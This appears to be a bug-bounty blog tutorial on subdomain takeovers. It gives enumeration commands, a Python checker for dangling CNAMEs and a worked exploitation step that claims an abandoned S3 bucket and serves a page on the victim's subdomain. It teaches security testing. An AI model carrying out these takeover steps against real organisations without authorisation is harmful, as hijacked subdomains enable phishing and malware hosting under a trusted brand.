Subdomain takeovers are recon goldmines. One abandoned DNS record — pointing to a dead S3 bucket, Azure Blob, or GitHub page — can give you full control over a target’s subdomain. In bug bounty, this is a money category: it scales, it’s automation-friendly, and companies pay because it undermines trust in their brand.
What is a Subdomain Takeover?
A subdomain takeover occurs when a DNS record points to a third-party service resource that is no longer claimed.
Examples:
test.company.com → CNAME → test-bucket.s3.amazonaws.com (bucket deleted).
blog.company.com → CNAME → company.github.io (repo removed).
files.company.com → CNAME → company.azurewebsites.net (site deleted).
If the resource is unclaimed, you register it → instant control of the subdomain.
Recon Workflow
# 1. Subdomain enumeration
subfinder -d target.com -all -o subs.txt
amass enum -passive -d target.com -o amass.txt
cat subs.txt amass.txt | sort -u > all_subs.txt
# 2. Resolve to check which are alive
httpx -l all_subs.txt -status-code -title -tech-detect -o hosts.txt
# 3. Look for dangling CNAMEs
dig CNAME sub.target.com
nslookup sub.target.com
Signs of vulnerability:
“NoSuchBucket” (AWS S3)
“Repository not found” (GitHub Pages)
“Site not found” (Azure/Heroku/CloudFront)
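To turn the dig step and the error fingerprints above into a repeatable check, here is an added example (not code from the original post, and not the tooling it names) that parses `dig CNAME` answer lines, maps the target to a provider, and flags a host only when the response body carries that provider's unclaimed-resource text. The fingerprint table and the sample records are constructed from the signs listed in this post; a match is a candidate to verify by hand, not a confirmed takeover.

```python
import re

# Provider fingerprints taken from the signs listed in the post: CNAME suffix
# plus the error text the provider returns for an unclaimed resource.
FINGERPRINTS = [
    ("s3.amazonaws.com", "NoSuchBucket", "AWS S3"),
    ("github.io", "Repository not found", "GitHub Pages"),
    ("azurewebsites.net", "Site not found", "Azure App Service"),
]

# Matches the answer-section line that `dig CNAME` prints, e.g.
# "test.company.com. 300 IN CNAME test-bucket.s3.amazonaws.com."
DIG_CNAME_RE = re.compile(r"^(\S+?)\.?\s+\d+\s+IN\s+CNAME\s+(\S+?)\.?$")

def parse_dig_cname(line):
    """Return (owner, target) from a dig CNAME answer line, or None."""
    m = DIG_CNAME_RE.match(line.strip())
    return (m.group(1), m.group(2)) if m else None

def classify(owner, target, body):
    """Flag a CNAME as a takeover candidate only when the target belongs to a
    known provider AND the HTTP body carries that provider's 'unclaimed' error."""
    for suffix, error_text, provider in FINGERPRINTS:
        if target.endswith(suffix):
            status = "candidate" if error_text in body else "claimed"
            return {"host": owner, "target": target, "provider": provider, "status": status}
    return {"host": owner, "target": target, "provider": None, "status": "unknown-provider"}

# Constructed sample: dig answer lines paired with the response body each host
# returned. Nothing here touches real DNS or HTTP.
SAMPLE = [
    ("test.company.com. 300 IN CNAME test-bucket.s3.amazonaws.com.", "<Code>NoSuchBucket</Code>"),
    ("blog.company.com. 300 IN CNAME company.github.io.", "Repository not found"),
    ("files.company.com. 300 IN CNAME company.azurewebsites.net.", "<html>File portal</html>"),
    ("www.company.com. 300 IN CNAME origin.company.com.", "<html>ok</html>"),
]

def find_candidates(sample=SAMPLE):
    """Return only records whose provider error says the resource is unclaimed."""
    findings = []
    for line, body in sample:
        parsed = parse_dig_cname(line)
        if parsed is None:
            continue
        result = classify(parsed[0], parsed[1], body)
        if result["status"] == "candidate":
            findings.append(result)
    return findings
```

Running `find_candidates()` on the sample flags test.company.com and blog.company.com; files.company.com is skipped because its body shows the Azure site is still claimed, and www.company.com is skipped because its target is not a known provider.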
Automation / Templates
With Nuclei:
nuclei -l all_subs.txt -t nuclei-templates/takeovers/ -o takeover-findings.txt
Nuclei ships with community templates for common providers (S3, Azure, Fastly, Shopify).
Exploitation
If sub.target.com points to company-test.s3.amazonaws.com and the bucket doesn’t exist:
# Claim the bucket
aws s3 mb s3://company-test --region us-east-1
# Upload a simple HTML page
echo "<h1>Owned by ToxSec</h1>" > index.html
aws s3 cp index.html s3://company-test/ --acl public-read
Now visiting sub.target.com serves your payload. That’s game over.
Real Bug Bounty Context
High trust impact: hijacked subdomains can host phishing kits, malware, or fake login portals.
Low skill floor, but automation weeds out duplicates fast.
Bounty triagers like these because they’re reproducible and easy to verify.
Pro tip: Always grab proof of concept (PoC) — a simple index.html with text like “ToxSec PoC: DO NOT REMOVE” — and report. Don’t leave anything weaponized.
References
EdOverflow’s Subdomain Takeover Guide: https://edoverflow.com/2017/10/13/what-is-a-subdomain-takeover/
Nuclei Templates: https://github.com/projectdiscovery/nuclei-templates
OWASP DNS Misconfig Testing: https://owasp.org/www-community/vulnerabilities/Testing_for_DNS_Misconfiguration
Command Recap
subfinder -d target.com -all -o subs.txt
amass enum -passive -d target.com -o amass.txt
cat subs.txt amass.txt | sort -u > all_subs.txt
httpx -l all_subs.txt -status-code -title -tech-detect -o hosts.txt
dig CNAME sub.target.com
nuclei -l all_subs.txt -t nuclei-templates/takeovers/ -o takeover-findings.txt
Final Thoughts
One dead pointer, one claimed resource, and suddenly you own their brand. Subdomain takeovers are a recon hunter’s payday — low effort, high visibility, and always worth scanning for.